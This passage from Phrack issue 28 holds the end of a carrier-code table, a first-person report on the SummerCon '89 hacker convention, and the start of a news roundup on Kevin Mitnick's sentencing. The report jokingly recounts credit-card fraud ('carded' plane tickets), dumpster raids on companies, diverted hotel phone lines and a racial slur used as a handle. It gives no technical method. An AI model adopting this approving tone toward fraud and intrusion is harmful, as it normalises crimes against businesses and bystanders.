  2238. 933     North American Communications
  2239. 936     Rainbow Commuinications
  2240. 937     Access Long Distance
  2241. 938     Access Long Distance
  2242. 951     Transamerica Telecommunications
  2243. 955     United Communications
  2244. 960     Access Plus
  2245. 963     Tenex Communications
  2246. 969     Dial-Net
  2247. 985     America Calling
  2248. 986     MCI Telecommunications (SBS)
  2249. 987     ClayDesta Communications
  2250. 988     Western Union Telegraph
  2251. 991     Access Long Distance
  2252. ____________________________________________________________
  2253.  
  2254.                                 ==Phrack Inc.==
  2255.  
  2256.                      Volume Three, Issue 28, File #8 of 12
  2257.  
  2258.            PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
  2259.            ^*^                                                   ^*^
  2260.            PWN         P h r a c k   W o r l d   N e w s         PWN
  2261.            ^*^         ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~         ^*^
  2262.            PWN            Special Edition Issue Three            PWN
  2263.            ^*^                                                   ^*^
  2264.            PWN       "Meet The Hackers Behind The Handles"       PWN
  2265.            ^*^                 June 23-25, 1989                  ^*^
  2266.            PWN                                                   PWN
  2267.            ^*^          Created, Written, and Edited             ^*^
  2268.            PWN               by Knight Lightning                 PWN
  2269.            ^*^                                                   ^*^
  2270.            PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
  2271.  
  2272.  
  2273. SummerCon... What is it?  In many ways, SummerCon is much more
  2274. than just a convention that attracts America's greatest phreaking
  2275. and hacking personalities.  SummerCon is a state of mind.
  2276.  
  2277. Hackers by nature are urged on by a hidden sense of adventure to
  2278. explore the unknown, to challenge the unchallenged, to reach out
  2279. and experiment with anything and everything.  The realization
  2280. that we are not alone in our quest sometimes comes as a great
  2281. gift and the opportunity to meet one's heroes, partners, and
  2282. idols can be the most awe-inspiring aspect of the hacker
  2283. community -- this is what SummerCon is all about.
  2284.  
  2285. On the surface, SummerCon looks like a handful of youths hanging
  2286. out at a hotel in St. Louis, Missouri.  To me, it is more like
  2287. one of those madcap movies you see on late night Home Box Office
  2288. or something.  No real point or direction, rebels without cause,
  2289. all in the name of frantic fun and games.  The atmosphere
  2290. surrounding SummerCon is that of a dream world where once a year
  2291. you can escape to a fantasy where ingenuity is king and you have
  2292. friends around you at every moment.  SummerCon itself may only
  2293. last a weekend, but the friendships last a lifetime.
  2294.  
  2295. Welcome to SummerCon '89!  This special edition of Phrack World
  2296. News contains the exclusive coverage of the events and activities
  2297. of a handful of the nation's greatest hackers on June 23-25,
  2298. 1989.
  2299.  
  2300.  
  2301. PreCon '89:  Knight Lightning and Taran King Make Plans
  2302. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We
  2303. remembered the fun at SummerCon '87 and how SummerCon '88 had
  2304. lacked something.  In a sense, the first SummerCon was very
  2305. private because almost all of the attendants were members on
  2306. Metal Shop Private, the bulletin board that was once the center
  2307. of the "elite" modem community.  The second SummerCon was a
  2308. little different.  Both Taran and I had been out of action for
  2309. nearly a year and we had not intended to hold another convention
  2310. ever again until June 1988 when we both decided that one good
  2311. convention deserves another.  SummerCon '88 was thrown together
  2312. and a few changes were made.  It was good, but this year we
  2313. decided to set our sights higher than ever.
  2314.  
  2315.  
  2316. PreCon '89:  The Early Birds                    Thursday Evening,
  2317. June 22, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The first guests to
  2318. this year's convention arrived a day ahead of schedule.  Control
  2319. C, a veteran of the previous two conventions, and Erik Bloodaxe
  2320. flew in to St. Louis on Thursday evening, June 22, 1989.  They
  2321. were greeted by Forest Ranger and then after some rowdy
  2322. activities at the airport, the threesome adjourned to the Best
  2323. Western Executive International hotel -- The very same hotel
  2324. where the first SummerCon was held in June 1987.
  2325.  
  2326. Around 10 PM, Taran King and I met up and being unable to locate
  2327. Control C, Erik Bloodaxe, and Forest Ranger, we decided to take a
  2328. trip to the hotel on the chance that they would be there by the
  2329. time we showed up.  As we approached the hotel, I felt a strange
  2330. sensation like deja-vu.  It had been two years since I had been
  2331. to the Executive International, or even anywhere near that part
  2332. of town (with the exception of the airport).  At any rate, luck
  2333. was on our side.  We raced through the newly remodeled hotel
  2334. lobby and out past the pool.  Control C's and Erik Bloodaxe's
  2335. room stuck out like a beacon.  Their room became known as the
  2336. "Doom Room" in recognition of the many members of the Legion of
  2337. Doom/Hackers that stayed there throughout the course of the
  2338. weekend.
  2339.  
  2340. Control C and Erik Bloodaxe told us all about Black Ice-Con which
  2341. had taken place the weekend prior to SummerCon '89 in Dallas,
  2342. Texas.  The supposedly secret convention had been infiltrated by
  2343. security agents from U.S. Sprint.  They believed that the leak
  2344. existed on Black Ice itself, the bulletin board from which the
  2345. con took its name and all members were invited (there were less
  2346. than 20 people on the board).  They named who they thought the
  2347. leak was, but discretion prevents printing his name here.  On a
  2348. side note, Black Ice was crashed by SuperNigger and abandoned by
  2349. the members of LOD thereafter.
  2350.  
  2351. Erik had some interesting business cards with him.  He passed
  2352. several of them out to interested hackers and other miscellaneous
  2353. people at the hotel and in the St. Louis metropolitan area as
  2354. well.  These cards featured Erik Bloodaxe and the following
  2355. organizations;
  2356.  
  2357. -    American Telephone & Telegraph [AT&T] -    Federal Bureau of
  2358. Investigation [FBI] (Department of Justice) -    Secret Service
  2359. (Department of Treasury) -    Southwestern Bell Telephone Company
  2360. -    Tymnet (McDonnel Douglas)
  2361.  
  2362. Erik gave Taran and I each a set of the cards as souvenirs of his
  2363. visit.  Both of us had to work early morning shifts the next day
  2364. so a little after midnight we decided to leave.  I finally went
  2365. to sleep around 1 AM.
  2366.  
  2367.  
  2368. SummerCon '89:  The Adventure Begins              Friday Morning,
  2369. June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I woke up
  2370. around 5 AM to begin my day.  I had arranged to work the morning
  2371. shift 6-10 AM in order to avoid having to work the rest of the
  2372. day and weekend.  I returned home around 10:30 AM and I began the
  2373. final work on Phrack 27.  Although the issue date is June 20,
  2374. 1989, we did not really release the issue until June 27, due to
  2375. complications with SummerCon '89 and other events.  All of the
  2376. sudden I received a call from another veteran of SummerCons past,
  2377. a person who swore that he would not appear at this year's
  2378. convention...  TUC!
  2379.  
  2380. He tried to convince me that he was in Florida or anywhere but
  2381. St. Louis.  I asked him if he needed a ride from the airport to
  2382. the hotel or something.  The call sounded local as hell, but he
  2383. insisted on remaining consistent with his story for another few
  2384. minutes.  Then my call waiting beeped and it was Taran King.  I
  2385. juggled the lines for a few minutes and then had Taran call Tuc
  2386. (who was at the Executive International) while I got ready to go
  2387. meet him at the hotel.
  2388.  
  2389. As I was leaving my home, I noticed something sticking to the
  2390. front door.  It was a notice from United Parcel Service.  How
  2391. odd.  I did not notice it at 10:30 AM when I returned home and I
  2392. did not not hear anyone knock on the door since I had been home.
  2393. Still, the note said that they had left my package at the
  2394. subdivision club house.
  2395.  
  2396. So I dropped in there and found my package... would you believe
  2397. it came from Francis J. Haynes... Frank of "Frank and the Phunny
  2398. Phone Call" himself and that is exactly what was inside:  A
  2399. cassette tape sampler of Frank and the Phunny Phone Call.
  2400. Incidentally, Frank is being mastered on to compact disc and will
  2401. be available for sale soon.  More details on this will appear in
  2402. Phrack World News in the near future.
  2403.  
  2404. Eventually, I reached the hotel.  Control C and Erik Bloodaxe
  2405. were nowhere to be found and Forest Ranger and Taran King were
  2406. unavailable.  I found Tuc and we decided to go grab lunch and
  2407. drive around for a while.
  2408.  
  2409. We returned to the hotel and traded war stories about the past
  2410. year and decided to call the hotel office to see who might have
  2411. checked in during the past few hours.  No one we recognized was
  2412. here yet, but there was a call for Tuc on another line.  The lady
  2413. at the office switched the call into Tuc's room and I picked it
  2414. up.
  2415.  
  2416. It was Crimson Death of 618.  He wanted us to know that he was
  2417. arriving by bus later that evening and would need a ride at about
  2418. 10:45 PM.  He also informed us that Dr. Cypher was on his way in
  2419. and would arrived at the airport's bus terminal and take the
  2420. shuttle to the hotel.  He was unsure about what time this would
  2421. occur.
  2422.  
  2423. I told him I could pick him up at the bus terminal and that I had
  2424. to get off the phone.  I did, you see because it was at about
  2425. this time that Tuc had opened the windows and looked out by the
  2426. pool terrace.  Control C, Erik Bloodaxe, Forest Ranger, The
  2427. Urvile, and a guy by the name of Phil Free (known under various
  2428. other handles including Judas Christ) were out poolside and upon
  2429. noticing us had run over to climb through the window into the
  2430. room.
  2431.  
  2432.  
  2433. A Gathering Of Phreaks                          Friday Afternoon,
  2434. June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~ Finally the convention began
  2435. to get underway.  Greetings were exchanged and some discussion
  2436. about last year's convention took place.  I had brought laser
  2437. printed copies of Phracks 21 - 26 into Tuc's room and everyone
  2438. was interested in taking a look.  The Urvile was especially
  2439. curious about a certain quicknote that appeared in Phrack World
  2440. News Issue XXV/Part 3.  I would guess that the particular
  2441. quicknote in question was number five...it was about Telenet
  2442. security, but this is a story for another day.
  2443.  
  2444. The phone rang and Tuc answered.  He handed the phone to Control
  2445. C, who then disappeared without saying anything.  It was obvious
  2446. that Lex Luthor had arrived.  However, he wished to make his
  2447. current state of residence remain anonymous and so he decided to
  2448. park his car someplace other than the hotel parking lot and thus
  2449. he needed covert assistance.  After a few minutes Control C
  2450. returned with Lex and then all of the LODies ran quickly to the
  2451. Doom Room.  Taran King showed up around this time and then Tuc,
  2452. FR, TK, and I joined the others.
  2453.  
  2454. Shortly afterwards, Taran King, Erik Bloodaxe, and I decided to
  2455. go have a listen to Frank and the Phunny Phone Call.  I had not
  2456. played it yet and so we set up in the hotel lobby.  The first
  2457. part of the tape was not about Frank at all.  It was a
  2458. never-released, newly produced musical selection that seemed to
  2459. be called "My Telephone Is Acting Crazy."  It was interesting as
  2460. it employed different familiar telephone error messages, common
  2461. types of recordings, and touch tones.  When the actual Frank
  2462. messages began, we stopped the tape and left the lobby
  2463. immediately to avoid being thrown out -- the language was a
  2464. little too obscene for the conservative employees behind the
  2465. desk.  So we wandered the hotel looking for a place to play the
  2466. tape.  In the process we met Doc Holiday and Hugo Danner.
  2467.  
  2468. We finally gained access to Tuc's room (he was with Forest
  2469. Ranger, Phil Free, and the LOD in the Doom Room).  Doc Holiday
  2470. and Hugo went to drop their bags off in their room and ended up
  2471. in the Doom Room as well.  TK, EB, and I remained in Tuc's room
  2472. to hear the rest of the tape.  There was a knock at the door...
  2473. it was Bill From RNOC.
  2474.  
  2475. Taran and BFR disappeared almost instantly as Erik Bloodaxe began
  2476. to pursue Bill.  He evidently had some score to settle.  However,
  2477. TK and BFR were gone as if they had become invisible.  Erik
  2478. decided to finish listening to the tape.  We did and then went on
  2479. to the Doom Room where we discovered Lucifer 666 and Synthetic
  2480. Slug had arrived.  L666 had many stories to tell about their trip
  2481. to St. Louis and he also brought a video camera.  His biggest
  2482. concern was that his camera would scare the hell out of Lex...
  2483. and to some extent it did.  You see, as it was explained to me by
  2484. the LOD members (with Lex Luthor absent at the time) there is
  2485. paranoia and beyond paranoia, there is Lex.
  2486.  
  2487.  
  2488. SummerCon Craziness                             Friday Afternoon,
  2489. June 23, 1989 ~~~~~~~~~~~~~~~~~~~ As many readers might already
  2490. known, St. Louis is the world headquarters for McDonnell Douglas
  2491. Aircraft, the firm that also owns Tymnet.  This was no secret to
  2492. the Legion of Doom, who led a series of successful trashing raids
  2493. on them as well as Southwestern Bell and IBM.  The way I heard
  2494. it, they even took pictures.
  2495.  
  2496. Meanwhile, after spending some time hanging out with the gang at
  2497. the Executive International, Bill From RNOC, Taran King, Tuc, Lex
  2498. Luthor, and I went to get a bite to eat.  We ended up at Wendy's
  2499. because Tuc, being a vegetarian, wanted the salad bar.  We had a
  2500. little fun harassing the staff (who still owes BFR an iced tea).
  2501. We began to speculate on who this year's security agent would
  2502. be... after all there is always some informant or plant at
  2503. SummerCon -- it has become a tradition.
  2504.  
  2505. At this point, everyone's best bet was on Dr. Cypher.  Cypher had
  2506. admitted to having connections on the security side of things,
  2507. had once claimed to be busted and/or retired, supposedly told
  2508. U.S. Sprint all about Black Ice Con (to hell with discretion),
  2509. and all in all, was the major unknown who best fit the mold set
  2510. forth by Dan The Operator at SummerCon '87 (although his friend
  2511. that showed up with him, Cryptic Fist fit the mold rather well
  2512. too, but this is detailed later).  This is just what I had
  2513. gathered from various people at the convention and are not
  2514. necessarily my personal views.
  2515.  
  2516. The obvious telephone security person there was from Michigan
  2517. Bell -- Control C -- But no one was really worried about him.  He
  2518. had been able to attend Black Ice-Con and SummerCon '88 all
  2519. expenses paid by Michigan Bell, but he said that since his
  2520. superiors have read the PWN reports of SummerCons past, they felt
  2521. that this trip was pleasure, not business, and would not give him
  2522. a free ride any longer.
  2523.  
  2524. I hate to break this to the security folks out there, but
  2525. honestly, do you think I would write an article and include
  2526. information like whose computers, passwords, codes, and whatever
  2527. were handed out and discussed?  Why create negative publicity
  2528. like that.  Don't you all worry though... none of that EVER goes
  2529. on at SummerCon :-)
  2530.  
  2531. Before we left Wendy's, Tuc and BFR grabbed a stack of taco
  2532. shells and as we journeyed towards the hotel, BFR and Tuc
  2533. proceeded to throw parts of these shells at other vehicles and
  2534. pedestrians.  A few minutes after we had returned, everyone began
  2535. getting together to go pickup Android Pope (aka Cisban Evil
  2536. Priest) at the airport.  It was 7:15 PM by now and his flight
  2537. from New Jersey was supposed to arrive at 7:54 PM.
  2538.  
  2539.                "Are you an agent of the FBI or Secret Service?!"
  2540.  
  2541. This was Lucifer 666's standard question that he asked everyone
  2542. he came into contact with at the hotel -- guests, office
  2543. personnel, porters, and even the shuttle bus driver.  They all
  2544. replied with a confused "no."  It seemed to take an hour to get
  2545. the shuttle bus ready for passengers.  Bill From RNOC, Taran
  2546. King, and I were going to just hang out at the hotel, but I was
  2547. shanghaied on to the bus to the airport.
  2548.  
  2549. Just before we took off, the older gentleman that was serving as
  2550. our bus driver turned around and said, "You know how you fellas
  2551. were asking me if I was with the FBI..."  We all froze instantly
  2552. as he pulled out his badge.  No, he was not with the FBI, but he
  2553. was a recently retired deputy police chief for the St.  Louis
  2554. County Police Department.  Control C later remarked to me that
  2555. when the driver had shown his badge, he had half expected to hear
  2556. a loud series of clicks as the locks to all of the doors on the
  2557. shuttle bus shut and a barrier of some sort appeared between the
  2558. driver and the passengers... all of whom were SummerCon guests.
  2559.  
  2560. Instead, several of the hackers, Hugo and Forest Ranger for the
  2561. most part, began to question the retired officer about his gun
  2562. fights.  The driver remarked how he had been shot before and even
  2563. went so far as to show us some of his scars.  Lucifer asked, "Did
  2564. you kill the guy who shot you?"  The driver responded,
  2565. "Certainly."  This line of questioning went on for the duration
  2566. of the trip.  We got to the airport and moved out.
  2567.  
  2568.  
  2569. Erik Bloodaxe:  Missing In Action                 Friday Evening, June 23, 1989
  2570. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2571. Upon entering the lower terminal of Lambert Field (St. Louis
  2572. International Airport), this "motley crew" encountered a blonde
  2573. bombshell named Stephanie on one of the nearby payphones.
  2574. Control C was the first to approach her and he asked her if she
  2575. was talking to her boyfriend.  She wasn't and so he proceeded to
  2576. take the handset and talk to her friend.  In the meantime,
  2577. Lucifer 666 was filming the entire affair and several members of
  2578. the group (not including Lex or Tuc) began having their pictures
  2579. taken with blondie.  This situation soon turned to riot as almost
  2580. everyone wanted in on this action.  Eventually we shuffled off to
  2581. the American Airlines ticket counter to check up on Android
  2582. Pope's flight while Forest Ranger apologized for our behavior.
  2583.  
  2584. The scene at the ticket counter was somewhat grim.  You see
  2585. Android Pope was scheduled to arrive at 7:54 PM and apparently
  2586. the flight's arrival had been delayed... until 9:00 PM at the
  2587. earliest.  In the meantime, Forest Ranger was having a little
  2588. chat with Erik Bloodaxe.  He told EB that the blondie chick
  2589. thought he was a big geek and some other nasty things.  Erik
  2590. became so depressed that he headed back to talk to her again, but
  2591. none of us knew it at the time.
  2592.  
  2593. So now we had to kill an hour.  We started towards the far end of
  2594. the airport where a restaurant and bar were located.  On the way,
  2595. we encountered some people striking against Eastern and
  2596. Continental Airlines and handing out stickers that showed
  2597. "Lorenzo" with a circle around his name and a line through it
  2598. (much like a no U-turn sign or the NO FEDS pin from SummerCon
  2599. '88).  We took a lot of those stickers and put them on
  2600. unsuspecting people all over the airport.
  2601.  
  2602. Upon reaching the area just outside of the bar, we found a row of
  2603. payphones, a fancy vintage replica of a car, and a wheelchair.
  2604. Control C hopped into the chair (deja vu of SummerCon '87
  2605. occurred here when I remembered how Control C ended up in a
  2606. swimming pool last time) and Lucifer 666 started driving him all
  2607. about the airport.  The problem was that the wheelchair belonged
  2608. to this lady who was on the payphones and when she finally
  2609. noticed that it was missing she tracked Control and L666 down
  2610. screaming theft.
  2611.  
  2612. Finally we got to the bar.  We sat down and talked for a while
  2613. watching planes take off and land.  After a few minutes I noticed
  2614. that Erik had disappeared.  We retraced our steps all the way
  2615. back to the payphones where we encountered blondie without any
  2616. success whatsoever.  Then we went to the American Airlines ticket
  2617. counter and had Erik paged.  We also did the same thing at the
  2618. Trans World Airlines and Braniff ticket counters.
  2619.  
  2620. Since we could not find him, about half of us decided it was time
  2621. to head back to the hotel and let the rest of the group wait for
  2622. Android Pope.  We all went out to the street where the buses stop
  2623. and waited.  A very strange incident took place here.  Another
  2624. group of guys ventured forth with a person who was blindfolded
  2625. and handcuffed.  They said, "This is what happens when you break
  2626. the law guys... illegal trafficking in cocaine... Columbian."
  2627. Forest Ranger asked if they had any to spare.  Oddly enough, they
  2628. had their own video camera and were filming this and us while we
  2629. were filming them.  They soon disappeared into a parking garage.
  2630.  
  2631. Eventually the bus came and picked us up.  The Urvile, Lucifer
  2632. 666, Tuc, and Doc Holiday stayed behind to search for Android
  2633. Pope.  They caught a later shuttle bus back to the hotel.
  2634. However, mere moments after they had arrived, Dr. Cypher showed
  2635. up claiming he had just got off the shuttle bus.  Obviously this
  2636. could not be true because these buses are very small and there is
  2637. no way L666, Urvile, Tuc, DH, and AP could have missed him and
  2638. his friend Cryptic Fist.
  2639.  
  2640. It was around 11:00 PM when I remembered that Crimson Death was
  2641. due at the bus station downtown.  Bill From RNOC and Taran King
  2642. accompanied me to go pick him up and were we ever surprised when
  2643. we saw him.  He was no longer the short little kid we had met at
  2644. SummerCon '88.
  2645.  
  2646. We returned to the hotel to discover that Erik Bloodaxe had
  2647. finally made it back.  After hearing what Forest Ranger told him
  2648. about what Stephanie had to say (calling him a geek or something
  2649. similar), he decided to go to her again.  He walked with her to
  2650. her gate and stayed until her plane left.  He later remarked that
  2651. he had heard us paging him, but decided to ignore it.  After his
  2652. return, the entire SummerCon group headed out to the midnight
  2653. showing of the premiere day of "Batman."  L666 attempted to sneak
  2654. his video camera into the movie, but changed his mind and did a
  2655. "jaywalk" instead.  After the flick everyone just hung out for a
  2656. while.  The Doom Room crew went to sleep because Control C had an
  2657. early flight to catch the next morning and Taran and I crashed
  2658. around 5:30 AM.
  2659.  
  2660.  
  2661. Conference Day A.M.                             Saturday Morning, June 24, 1989
  2662. ~~~~~~~~~~~~~~~~~~~
  2663. The hotel was trashed.  Forest Ranger and Lucifer 666 watched as
  2664. the hotel employees were forced to clean up the mess that was
  2665. left behind after the previous evening's activities.  One maid
  2666. remarked, "I know my boss wants your business, but he sure as
  2667. hell don't want all these beer cans."  Control C was gone, but he
  2668. had performed a practical joke on Lucifer 666 and Synthetic Slug
  2669. before he left, leaning a trashcan full of ice on their door so
  2670. that when it was opened, all of the ice would fall into the room.
  2671. According to Erik Bloodaxe, Control C also walked off with a jean
  2672. jacket that did not belong to him -- No honor among hackers?
  2673.  
  2674. Aristotle and Predat0r arrived sometime during the morning with a
  2675. small suitcase full of TAP issues and other materials for the
  2676. convention.  Crimson Death lit a pizza on fire in one of the
  2677. rooms in order to perform a demonic ritual that was reminiscent
  2678. of the first SummerCon (1987) when Lucifer 666 attempted
  2679. (unsuccessfully) to eat fire.
  2680.  
  2681.  
  2682. The Conference                                Saturday Afternoon, June 24, 1989
  2683. ~~~~~~~~~~~~~~
  2684. It was at this time that Taran King, Forest Ranger, and I handed
  2685. out the Official SummerCon '89 buttons and posters.  In addition
  2686. to this, I handed out keychain flashlights that showed the logo
  2687. of Ameritech as well as a few specially designed "Legion" buttons
  2688. to the LOD members that were there.
  2689.  
  2690. Forest Ranger got things started by welcoming everyone to the
  2691. conference and asking them to take a seat.  Mysteriously, Dr.
  2692. Cypher had decided not to attend the conference, but his pal
  2693. Cryptic Fist was there with a micro-tape recorder in the pocket
  2694. of his leather jacket (that he refused to take off even though it
  2695. was a blistering 94 degrees).
  2696.  
  2697. Our first speaker was Aristotle.  He talked for a while about the
  2698. new TAP Magazine, how it worked, and how to subscribe.  He took
  2699. quite a beating from the large amount of criticism directed at
  2700. him because of the lack of originality in the name of the
  2701. publication as well as not having been given official permission
  2702. to use the name.  As it turns out, the ownership of the TAP name
  2703. currently resides with Tuc.  Tuc was there at the conference, so
  2704. Aristotle put the question to him, "Can I do it?"  Tuc basically
  2705. said he thought it was ok, but he wanted to talk to Cheshire
  2706. Catalyst about it.  The situation remains unresolved.
  2707.  
  2708. The next speaker was Lex Luthor.  Lex discussed a topic that was
  2709. a little more familiar to most everyone at the conference -- Code
  2710. Abuse.   For the most part, he presented the standard methods in
  2711. which companies try and track down code abusers and strongly
  2712. advised that everyone not abuse codes.  He also went on to
  2713. criticize Brew Associates for releasing a new edition of Code
  2714. Thief.
  2715.  
  2716. Taran and I spoke next.  For the most part we talked about Phrack
  2717. Inc. and what lies ahead concerning the newsletter.  We also
  2718. brought up discussion on the Internet and the plausibility of
  2719. security agencies using "grep" to track down hackers across the
  2720. world.  We also discussed our recent excursion through a GTE
  2721. Central Office and what we found.
  2722.  
  2723. The Urvile gave a short lecture on Unix hacking and then it was
  2724. Bill From RNOC's turn to speak.  For the most part, he discussed
  2725. 2600 Meetings (that take place once a month at The Citicorp
  2726. Center in New York City).  He spoke briefly about Eric Corley and
  2727. the publication 2600 Magazine.  Afterwards, he played a humorous
  2728. recording in which he engineered an insane gentleman to believe
  2729. that he was a news reporter and got his story about computers in
  2730. Utah taking over the world.  That concluded the regularly
  2731. scheduled speakers.
  2732.  
  2733. Group discussion began and the topics included:  TelePub '86,
  2734. Scan Man, Cheshire Catalyst, The Bootleg, and Red Knight.  We
  2735. listened to segments of Frank and The Phunny Phone Call and Group
  2736. Bell Presents the Adventures of Dom Tuffy for a while and then
  2737. started being really creative.  In a high spirited moment we
  2738. formed a large human pyramid and took pictures (that are supposed
  2739. to appear in TAP Magazine's next issue).
  2740.  
  2741.  
  2742. Poolside and Mellow                             Saturday Evening, June 24, 1989
  2743. ~~~~~~~~~~~~~~~~~~~
  2744. Aristotle, Predat0r, Doc Holiday, and Hugo Danner had to hit the
  2745. road soon after the convention ended.  However, another friend
  2746. named Stephan showed up after the conference and so did Doctor
  2747. Cypher with ParMaster and Rabbit.  Cypher told us a story about
  2748. how PM and Rabbit had carded plane tickets to St.  Louis and
  2749. stayed at the Holiday Inn-West.  However, after running up huge
  2750. tabs at the hotel, the management asked them to pay up in cash
  2751. and would not accept their credit card numbers.  They made a
  2752. narrow escape from the hotel and arrived at Best Western to stay
  2753. the night.
  2754.  
  2755. Par and Rabbit were very outgoing, they wanted to have Tuc, Lex,
  2756. and Erik come to their yacht in New York and go sailing.  It was
  2757. a very strange situation and parts of their story still do not
  2758. seem to make sense even today.  However, they proceeded to "fuck
  2759. the phones" at the hotel so that all calls going to the front
  2760. desk would be intercepted into BFR's room.  This was not very
  2761. pleasurable.
  2762.  
  2763. Most people went downtown for dinner that night and then everyone
  2764. ended up outside by the pool having a few drinks.  At one point
  2765. in the evening, Taran, BFR, Stephan, Forest Ranger, and I went
  2766. back to BFR's room and were followed by Erik Bloodaxe.  He
  2767. accused Bill of being a cocaine dealer and Forest Ranger erupted,
  2768. "THAT'S NOT COOL FUCKING WITH RNOC MAN!" and the two of them
  2769. (Erik and FR) came very close to blows.  It was soon settled and
  2770. the partying resumed.  A small group of us went on a mission that
  2771. night and what we discovered is a story for another day, but it
  2772. kept us busy until almost 6 AM.
  2773.  
  2774.  
  2775. So Long Farewell                                          Sunday, June 25, 1989
  2776. ~~~~~~~~~~~~~~~~
  2777. With the exception of Erik Bloodaxe, the Legion of Doom gang had
  2778. disappeared by the time Taran and I showed up at Best Western.
  2779. In fact, the only other hackers remaining in the vicinity were
  2780. Forest Ranger, BFR, Stephan, L666, and Synthetic Slug as far as
  2781. we could tell.  We said goodbye to L666 and SS and the rest of us
  2782. (not including Erik Bloodaxe, Tuc and Crimson Death who we found
  2783. out later were still in town) journeyed to Westport Plaza where
  2784. we spent the rest of the afternoon until it was time for BFR and
  2785. Stephan to catch their flights.  And that was SummerCon '89.
  2786. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2787.  
  2788. The following are the people who attended SummerCon '89:  (23
  2789. Total)
  2790.  
  2791.              Android Pope \ Aristotle \ Bill From RNOC \ Control
  2792.   C Crimson Death \ Cryptic Fist \ Doc Holiday \ Doctor Cypher \
  2793.   Erik Bloodaxe
  2794.    Forest Ranger \ Hugo Danner \ Knight Lightning \ Lex Luthor \
  2795.      Lucifer 666 ParMaster \ Phil Free \ Predat0r \ Rabbit \
  2796.      Stephan \ Synthetic Slug
  2797.                          Taran King \ Tuc \ The Urvile
  2798.  
  2799. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2800.  
  2801. Who Didn't Attend SummerCon '89... And Why!
  2802. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2803. Ax Murderer:  "Definitely next year."
  2804. Bad Subscript:  "Dan wouldn't pay for me this time."
  2805. Broadway Hacker:  "I have a date that weekend."
  2806. Cheshire Catalyst:  "I have a HAM convention."
  2807. CompuPhreak:  "I was trying to fix my Watson."
  2808. Eric Corley:  "It's either this or GHP."
  2809. Cray-Z Phreaker and SkunkWorks gang:  "I was competing in a regatta."
  2810. DarkMage:  "My hard disk drive broke and I need the cash to fix it."
  2811. The Datamaster, Peter Pulse, Magnetic Surfer:  "It should be in New York City."
  2812. Dave Starr:  (Disappeared off of the face of the earth again)
  2813. Dead Lord:  "I was at camp."
  2814. Delta-Master:  "I am going to the Galactic Hackers Party too."  (No show)
  2815. The Disk Jockey and Shade:  "I thought it was next weekend...sorry."
  2816. Epsilon:  "My mom said she didn't feel like going to St. Louis."
  2817. The Executioner:  "I had a beauty shop appointment."
  2818. Katie Hafner:  "Forest Ranger would not let me go."
  2819. Hatchet Molly:  "I got married."
  2820. Karl Marx:  "I had a job interview... sue me."
  2821. The Leftist:  "<Sniff> I'm in the hospital."
  2822. MAC???:  "Why don't you guys have it in California this year?"
  2823. John Maxfield:  "I was there... the Holiday Inn-West, right?"
  2824. The Mentor:  "I'll have my own in Texas instead."
  2825. Oryan QUEST:  "I got deported."
  2826. Phantom Phreaker and Doom Prophet:  "We went camping... with our parents."
  2827. Phrozen Ghost and Surfer Bob:  "Scared of seeing Crimson Death."
  2828. Promethius:  "I decided to spend the weekend with Broadway Hacker instead."
  2829. Red Knight:  "I was in Kenya visiting relatives."
  2830. Remington Steal and Chanda Leir:  "We'd rather be alone if you don't mind."
  2831. Sigmund Fraud:  "I still have another 7 or 8 weeks of basic training."
  2832. Silver Spy:  "I'll be there if I can."
  2833. Sir Francis Drake:  "Had to get my other nostril pierced."
  2834. The Renegade Chemist:  "I didn't feel like taking the heat for MY TAP."
  2835. Tuc:  "I am never coming to another convention again... whoops!"
  2836. VaxCat and Phase Shifter:  (In August) "When is that anyway?"
  2837. Violence and The Scythian:  "We got busted by SoutherNet, but we'll be there!"
  2838.  
  2839. Needless to say, those who missed the convention, missed out.  Plans are
  2840. already underway for SummerCon '90 --KL
  2841. __________________________________________________________________
  2842.  
  2843.                                 ==Phrack Inc.==
  2844.  
  2845.                      Volume Three, Issue 28, File #9 of 12
  2846.  
  2847.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2848.             PWN                                                 PWN
  2849.             PWN        P h r a c k   W o r l d   N e w s        PWN
  2850.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  2851.             PWN               Issue XXVIII/Part 1               PWN
  2852.             PWN                                                 PWN
  2853.             PWN                 October 7, 1989                 PWN
  2854.             PWN                                                 PWN
  2855.             PWN          Created, Written, and Edited           PWN
  2856.             PWN               by Knight Lightning               PWN
  2857.             PWN                                                 PWN
  2858.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2859.  
  2860.  
  2861.                  Welcome to Issue XXVIII of Phrack World News!
  2862.  
  2863. This issue of Phrack World News contains stories and articles
  2864. detailing events from June - October, 1989 and features Bellcore,
  2865. Chalisti, Chaos Computer Club, Clifford Stoll, The Disk Jockey,
  2866. Fry Guy, The Grim Phreaker, Legion of Doom, The Leftist, Major
  2867. Havoc, Kevin Mitnick, Robert Morris, Oryan QUEST, The Prophet,
  2868. Red Rebel, Shadow Stalker, Shadow 2600, Terra, The Urvile, and
  2869. much more so keep reading.
  2870.  
  2871.         "The Real Future Is Behind You... And It's Only The
  2872. Beginning!"
  2873. _______________________________________________________________________________
  2874.  
  2875. Judge Suggests Computer Hacker Undergo Counseling
  2876. July 17, 1989
  2877. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2878. by Karen E. Klein (New York Times)
  2879.  
  2880. LOS ANGELES -- A federal judge has suggested that Los Angeles
  2881. computer hacker Kevin Mitnick be sentenced to a one-year
  2882. residential treatment program to break his "computer addiction."
  2883.  
  2884. Although she did not finalize her sentence, U.S. District Judge
  2885. Mariana R.  Pfaelzer said Monday that she thought Mitnick had
